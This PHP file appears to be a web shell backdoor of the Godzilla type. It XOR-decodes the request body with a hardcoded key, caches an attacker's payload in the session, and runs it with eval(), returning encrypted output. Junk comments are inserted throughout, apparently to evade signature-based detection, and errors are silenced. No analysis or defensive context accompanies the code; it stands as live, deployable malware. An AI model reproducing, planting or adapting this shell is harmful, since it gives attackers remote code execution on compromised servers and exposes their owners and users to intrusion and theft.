<?php
@session_start/*asd123123*/();
@set_time_limit/*asd123123*/(0);
@error_reporting/*asd123123*/(0);
function/*asdasdasd*/encode/*asd123123*/($D,$K){
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/for/*asd123123*/($i=0;$i<strlen/*asd123123*/($D);$i++)/*asdasdasd*/{
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$c/*asdasdasd*/=/*asdasdasd*/$K/*asd123123*/[$i+1&15];
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$D/*asd123123*/[$i]/*asdasdasd*/=/*asdasdasd*/$D/*asd123123*/[$i]^$c;
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/}
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/return/*asdasdasd*/$D;
}
$payloadName='payload';
$key='e10adc3949ba59ab';
$data=file_get_contents/*asd123123*/("php://input");
if/*asdasdasd*//*asd123123*/($data!==false){
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$data=encode/*asd123123*/($data,$key);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/if/*asdasdasd*//*asd123123*/(isset/*asd123123*/($_SESSION/*asd123123*/[$payloadName])){
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$payload=encode/*asd123123*/($_SESSION/*asd123123*/[$payloadName],$key);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/if/*asdasdasd*//*asd123123*/(strpos/*asd123123*/($payload,"getBasicsInfo")===false){
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$payload=encode/*asd123123*/($payload,$key);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/}
		eval/*asd123123*/($payload);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasd*/echo/*asd123123*//*asdasdasd*/encode/*asd123123*/(@run/*asd123123*/($data),$key);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/}else{
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/if/*asdasdasd*//*asd123123*/(strpos/*asd123123*/($data,"getBasicsInfo")!==false){
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/$_SESSION/*asd123123*/[$payloadName]=encode/*asd123123*/($data,$key);
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/}
/*asdasdasd*//*asdasdasd*//*asdasdasd*//*asdasdasd*/}
}